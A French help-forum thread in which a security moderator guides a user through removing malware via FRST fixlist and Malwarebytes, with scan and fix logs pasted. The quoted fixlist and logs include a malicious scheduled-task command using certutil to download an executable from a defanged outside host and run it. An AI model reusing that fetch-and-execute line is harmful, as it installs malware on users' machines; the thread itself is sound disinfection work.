Windows ne trouve pas le fichier dhide.vbs
Résolu/Fermé
Naci
-
20 déc. 2018 à 10:40
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 1 janv. 2019 à 23:17
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 1 janv. 2019 à 23:17
A voir également:
- Windows ne trouve pas le fichier dhide.vbs
- Windows ne démarre pas - Guide
- Fichier rar - Guide
- Comment réduire la taille d'un fichier - Guide
- Comment ouvrir un fichier epub ? - Guide
- Fichier host - Guide
4 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
20 déc. 2018 à 11:03
20 déc. 2018 à 11:03
Salut,
Pour vérifier ton ordinateur, pour d'éventuels infections et avoir un état général du système :
Suis le tutoriel FRST en cliquant sur ce lien bleu. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
(Les liens bleus mènent à des tutoriels explicatifs pas à pas, clic dessus pour avoir les instructions plus précises à suivre).
Pour vérifier ton ordinateur, pour d'éventuels infections et avoir un état général du système :
Suis le tutoriel FRST en cliquant sur ce lien bleu. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
- FRST.txt
- Shortcut.
- Additionnal.txt
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
(Les liens bleus mènent à des tutoriels explicatifs pas à pas, clic dessus pour avoir les instructions plus précises à suivre).
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
20 déc. 2018 à 11:37
20 déc. 2018 à 11:37
Tu as bien infecté ton ordi, surement à la suit d'un crack.
A désinstaller :
CCleaner
CyberLink
CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu veux le garder, désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
A désinstaller :
CCleaner
CyberLink
CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu veux le garder, désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\...\Run: [UpdateAdmin] => C:\Users\7 Pro\AppData\Local\UpdateAdmin\UpdateAdmin.exe [236960 2016-08-11] ()
2018-12-20 10:09 - 2018-12-20 10:09 - 000003488 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-12-20 10:09 - 2018-12-20 10:09 - 000003186 _____ C:\Windows\System32\Tasks\csrss
2018-12-20 10:08 - 2018-12-20 10:08 - 000000000 ___HD C:\Windows\rss
Task: {3D9FDEE2-D740-4874-AF2B-E0A1452E6732} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-12-20] () <==== ATTENTION
Task: {678165F7-8397-4B04-A2A9-872382AEF31E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://monopeets.com/app/app.exe C:\Users\7 Pro\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\7 Pro\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {6ED759F5-F37A-4847-BC42-9A0CE46A23B8} - \AutoKMS -> Pas de fichier <==== ATTENTION
Task: {A2ED5519-C23B-4D0D-8799-E2865794309E} - System32\Tasks\UpdateAdmin => C:\Users\7 Pro\AppData\Local\UpdateAdmin\UpdateAdmin.exe [2016-08-11] () <==== ATTENTION
HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\...\Run: [SparklingMorning] => C:\Windows\rss\csrss.exe [4320256 2018-12-20] () <==== ATTENTION
HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\...\Run: [CloudNet] => C:\Users\7 Pro\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2018-12-20] (EpicNet Inc.) <==== ATTENTION
Startup: C:\Users\7 Pro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvidia_cryptex_hd.vbs.lnk [2017-04-14]
ShortcutTarget: nvidia_cryptex_hd.vbs.lnk -> C:\Users\7 Pro\AppData\Roaming\AppData\nvidia_cryptex_hd.vbs ()
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Bonne Année, et merci pour vos réponses, voila le texte :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 29.12.2018
Exécuté par 7 Pro (01-01-2019 01:44:16) Run:1
Exécuté depuis C:\Users\7 Pro\Desktop
Profils chargés: 7 Pro (Profils disponibles: 7 Pro)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\...\Run: [UpdateAdmin] => C:\Users\7 Pro\AppData\Local\UpdateAdmin\UpdateAdmin.exe [236960 2016-08-11] ()
2018-12-20 10:09 - 2018-12-20 10:09 - 000003488 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-12-20 10:09 - 2018-12-20 10:09 - 000003186 _____ C:\Windows\System32\Tasks\csrss
2018-12-20 10:08 - 2018-12-20 10:08 - 000000000 ___HD C:\Windows\rss
Task: {3D9FDEE2-D740-4874-AF2B-E0A1452E6732} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-12-20] () <==== ATTENTION
Task: {678165F7-8397-4B04-A2A9-872382AEF31E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://monopeets.com/app/app.exe C:\Users\7 Pro\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\7 Pro\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {6ED759F5-F37A-4847-BC42-9A0CE46A23B8} - \AutoKMS -> Pas de fichier <==== ATTENTION
Task: {A2ED5519-C23B-4D0D-8799-E2865794309E} - System32\Tasks\UpdateAdmin => C:\Users\7 Pro\AppData\Local\UpdateAdmin\UpdateAdmin.exe [2016-08-11] () <==== ATTENTION
HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\...\Run: [SparklingMorning] => C:\Windows\rss\csrss.exe [4320256 2018-12-20] () <==== ATTENTION
HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\...\Run: [CloudNet] => C:\Users\7 Pro\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2018-12-20] (EpicNet Inc.) <==== ATTENTION
Startup: C:\Users\7 Pro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvidia_cryptex_hd.vbs.lnk [2017-04-14]
ShortcutTarget: nvidia_cryptex_hd.vbs.lnk -> C:\Users\7 Pro\AppData\Roaming\AppData\nvidia_cryptex_hd.vbs ()
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\Software\Microsoft\Windows\CurrentVersion\Run\\UpdateAdmin" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"C:\Windows\rss" dossier déplacer:
Impossible de déplacer "C:\Windows\rss" => Planifié pour déplacement au redémarrage.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3D9FDEE2-D740-4874-AF2B-E0A1452E6732}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3D9FDEE2-D740-4874-AF2B-E0A1452E6732}" => supprimé(es) avec succès
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{678165F7-8397-4B04-A2A9-872382AEF31E}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{678165F7-8397-4B04-A2A9-872382AEF31E}" => supprimé(es) avec succès
"C:\Windows\System32\Tasks\ScheduledUpdate" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{6ED759F5-F37A-4847-BC42-9A0CE46A23B8}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6ED759F5-F37A-4847-BC42-9A0CE46A23B8}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A2ED5519-C23B-4D0D-8799-E2865794309E}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A2ED5519-C23B-4D0D-8799-E2865794309E}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\UpdateAdmin => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UpdateAdmin" => supprimé(es) avec succès
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\Software\Microsoft\Windows\CurrentVersion\Run\\SparklingMorning" => supprimé(es) avec succès
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => supprimé(es) avec succès
C:\Users\7 Pro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvidia_cryptex_hd.vbs.lnk => déplacé(es) avec succès
C:\Users\7 Pro\AppData\Roaming\AppData\nvidia_cryptex_hd.vbs => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 8467803 B
Java, Flash, Steam htmlcache => 1108 B
Windows/system/drivers => 562613 B
Edge => 0 B
Chrome => 30075762 B
Firefox => 0 B
Opera => 412189450 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 18129 B
systemprofile32 => 8264866 B
LocalService => 132244 B
NetworkService => 692 B
7 Pro => 10787260 B
RecycleBin => 0 B
EmptyTemp: => 456.7 MB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 01-01-2019 01:46:54)
C:\Windows\rss => a été déplacé(e) avec succès
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 29.12.2018
Exécuté par 7 Pro (01-01-2019 01:44:16) Run:1
Exécuté depuis C:\Users\7 Pro\Desktop
Profils chargés: 7 Pro (Profils disponibles: 7 Pro)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\...\Run: [UpdateAdmin] => C:\Users\7 Pro\AppData\Local\UpdateAdmin\UpdateAdmin.exe [236960 2016-08-11] ()
2018-12-20 10:09 - 2018-12-20 10:09 - 000003488 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-12-20 10:09 - 2018-12-20 10:09 - 000003186 _____ C:\Windows\System32\Tasks\csrss
2018-12-20 10:08 - 2018-12-20 10:08 - 000000000 ___HD C:\Windows\rss
Task: {3D9FDEE2-D740-4874-AF2B-E0A1452E6732} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-12-20] () <==== ATTENTION
Task: {678165F7-8397-4B04-A2A9-872382AEF31E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://monopeets.com/app/app.exe C:\Users\7 Pro\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\7 Pro\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {6ED759F5-F37A-4847-BC42-9A0CE46A23B8} - \AutoKMS -> Pas de fichier <==== ATTENTION
Task: {A2ED5519-C23B-4D0D-8799-E2865794309E} - System32\Tasks\UpdateAdmin => C:\Users\7 Pro\AppData\Local\UpdateAdmin\UpdateAdmin.exe [2016-08-11] () <==== ATTENTION
HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\...\Run: [SparklingMorning] => C:\Windows\rss\csrss.exe [4320256 2018-12-20] () <==== ATTENTION
HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\...\Run: [CloudNet] => C:\Users\7 Pro\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2018-12-20] (EpicNet Inc.) <==== ATTENTION
Startup: C:\Users\7 Pro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvidia_cryptex_hd.vbs.lnk [2017-04-14]
ShortcutTarget: nvidia_cryptex_hd.vbs.lnk -> C:\Users\7 Pro\AppData\Roaming\AppData\nvidia_cryptex_hd.vbs ()
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\Software\Microsoft\Windows\CurrentVersion\Run\\UpdateAdmin" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"C:\Windows\rss" dossier déplacer:
Impossible de déplacer "C:\Windows\rss" => Planifié pour déplacement au redémarrage.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3D9FDEE2-D740-4874-AF2B-E0A1452E6732}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3D9FDEE2-D740-4874-AF2B-E0A1452E6732}" => supprimé(es) avec succès
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{678165F7-8397-4B04-A2A9-872382AEF31E}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{678165F7-8397-4B04-A2A9-872382AEF31E}" => supprimé(es) avec succès
"C:\Windows\System32\Tasks\ScheduledUpdate" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{6ED759F5-F37A-4847-BC42-9A0CE46A23B8}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6ED759F5-F37A-4847-BC42-9A0CE46A23B8}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A2ED5519-C23B-4D0D-8799-E2865794309E}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A2ED5519-C23B-4D0D-8799-E2865794309E}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\UpdateAdmin => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UpdateAdmin" => supprimé(es) avec succès
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\Software\Microsoft\Windows\CurrentVersion\Run\\SparklingMorning" => supprimé(es) avec succès
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => supprimé(es) avec succès
C:\Users\7 Pro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvidia_cryptex_hd.vbs.lnk => déplacé(es) avec succès
C:\Users\7 Pro\AppData\Roaming\AppData\nvidia_cryptex_hd.vbs => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 8467803 B
Java, Flash, Steam htmlcache => 1108 B
Windows/system/drivers => 562613 B
Edge => 0 B
Chrome => 30075762 B
Firefox => 0 B
Opera => 412189450 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 18129 B
systemprofile32 => 8264866 B
LocalService => 132244 B
NetworkService => 692 B
7 Pro => 10787260 B
RecycleBin => 0 B
EmptyTemp: => 456.7 MB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 01-01-2019 01:46:54)
C:\Windows\rss => a été déplacé(e) avec succès
Fin de Fixlog 01:46:54
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
1 janv. 2019 à 12:17
1 janv. 2019 à 12:17
Bonne année =)
fais la suite de la procédure.
fais la suite de la procédure.
Bonjour
Voila le rapport de l'Analyse par Malwarebytes
Malwarebytes
www.malwarebytes.com
-Détails du journal-
Date de l'analyse: 01/01/2019
Heure de l'analyse: 16:38
Fichier journal: 40b92594-0ddb-11e9-a645-00ff82716bda.json
-Informations du logiciel-
Version: 3.6.1.2711
Version de composants: 1.0.508
Version de pack de mise à jour: 1.0.8579
Licence: Essai
-Informations système-
Système d'exploitation: Windows 7 Service Pack 1
Processeur: x64
Système de fichiers: NTFS
Utilisateur: KHIER_NACIRA\7 Pro
-Résumé de l'analyse-
Type d'analyse: Analyse des menaces
Analyse lancée par: Manuel
Résultat: Terminé
Objets analysés: 298827
Menaces détectées: 68
Menaces mises en quarantaine: 68
Temps écoulé: 5 min, 53 s
-Options d'analyse-
Mémoire: Activé
Démarrage: Activé
Système de fichiers: Activé
Archives: Activé
Rootkits: Désactivé
Heuristique: Activé
PUP: Détection
PUM: Détection
-Détails de l'analyse-
Processus: 4
PUP.Optional.CloudNet, C:\USERS\7 PRO\APPDATA\LOCAL\TEMP\CSRSS\CLOUDNET.EXE, En quarantaine, [6118], [448845],1.0.8579
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, En quarantaine, [411], [455564],1.0.8579
RiskWare.BitCoinMiner, C:\USERS\7 PRO\APPDATA\LOCAL\TEMP\WUP\WUP.EXE, En quarantaine, [707], [512161],1.0.8579
Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, En quarantaine, [411], [430694],1.0.8579
Module: 4
PUP.Optional.CloudNet, C:\USERS\7 PRO\APPDATA\LOCAL\TEMP\CSRSS\CLOUDNET.EXE, En quarantaine, [6118], [448845],1.0.8579
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, En quarantaine, [411], [455564],1.0.8579
RiskWare.BitCoinMiner, C:\USERS\7 PRO\APPDATA\LOCAL\TEMP\WUP\WUP.EXE, En quarantaine, [707], [512161],1.0.8579
Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, En quarantaine, [411], [430694],1.0.8579
Clé du registre: 22
Trojan.Clicker, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\csrss, En quarantaine, [3155], [431499],1.0.8579
Trojan.Clicker, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FB5A0873-4FD4-4BC2-964D-938BF076247C}, En quarantaine, [3155], [431499],1.0.8579
Trojan.Clicker, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{FB5A0873-4FD4-4BC2-964D-938BF076247C}, En quarantaine, [3155], [431499],1.0.8579
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinDefender, En quarantaine, [411], [455564],1.0.8579
RiskWare.BitCoinMiner, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CloudNet, En quarantaine, [707], [512160],1.0.8579
RiskWare.BitCoinMiner, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\EpicNet Inc., En quarantaine, [707], [451809],1.0.8579
PUP.Optional.TNT, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\TNT2, En quarantaine, [6773], [244086],1.0.8579
PUP.Optional.eShield, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{CAFCAD76-D224-420C-87C4-0E3732715D45}, En quarantaine, [243], [316519],1.0.8579
PUP.Optional.TNT, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FF21F6C5-26FF-4473-AE8B-E31942A79141}, En quarantaine, [6773], [244085],1.0.8579
PUP.Optional.TidyNetwork, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\DRAGDROP\{70BC1CDB-0744-4172-BDA0-B5A487D00C3A}, En quarantaine, [190], [244072],1.0.8579
PUP.Optional.TidyNetwork, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TNT2User_RASAPI32, En quarantaine, [190], [256466],1.0.8579
PUP.Optional.TidyNetwork, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TNT2User_RASMANCS, En quarantaine, [190], [256466],1.0.8579
PUP.Optional.UpdateAdmin, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\DOWNLOADADMIN\UpdateAdmin, En quarantaine, [2663], [244351],1.0.8579
PUP.Optional.UpdateAdmin, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{57FC95C5-B741-469C-8607-B39CEC423824}, En quarantaine, [2663], [244354],1.0.8579
PUP.Optional.eShield, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\edbmobghbfpobjijpbkahojamahhjhgo, En quarantaine, [243], [307541],1.0.8579
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, En quarantaine, [3687], [513779],1.0.8579
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F3F0B9A0-24FF-4B5F-88FC-F83A470142AF}, En quarantaine, [3687], [513779],1.0.8579
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{F3F0B9A0-24FF-4B5F-88FC-F83A470142AF}, En quarantaine, [3687], [513779],1.0.8579
PUP.Optional.SweetIM, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{DEDAF650-12B8-48F5-A843-BBA100716106}, En quarantaine, [375], [168883],1.0.8579
PUP.Optional.FindWide, HKLM\SOFTWARE\CLASSES\INTERFACE\{0FEB2313-F89B-4AC6-8153-84025604A06A}, En quarantaine, [341], [169193],1.0.8579
PUP.Optional.FindWide, HKLM\SOFTWARE\CLASSES\CLSID\{0FEB2313-F89B-4AC6-8153-84025604A06A}, En quarantaine, [341], [169193],1.0.8579
PUP.Optional.TidyNetwork, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{72A6AB0F-2FA8-4C73-9FCB-1E62A608F001}, En quarantaine, [190], [168908],1.0.8579
Valeur du registre: 12
RiskWare.BitCoinMiner, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CloudNet, En quarantaine, [707], [512160],1.0.8579
PUP.Optional.eShield, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{CAFCAD76-D224-420C-87C4-0E3732715D45}|URL, En quarantaine, [243], [316519],1.0.8579
PUP.Optional.TNT, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FF21F6C5-26FF-4473-AE8B-E31942A79141}|OSDFILEURL, En quarantaine, [6773], [244085],1.0.8579
PUP.Optional.TNT, HKU\S-1-5-21-3309935924-4281979646-3212623457-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FF21F6C5-26FF-4473-AE8B-E31942A79141}|FAVICONURL, En quarantaine, [6773], [244085],1.0.8579
Trojan.Clicker, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FB5A0873-4FD4-4BC2-964D-938BF076247C}|PATH, En quarantaine, [3155], [431497],1.0.8579
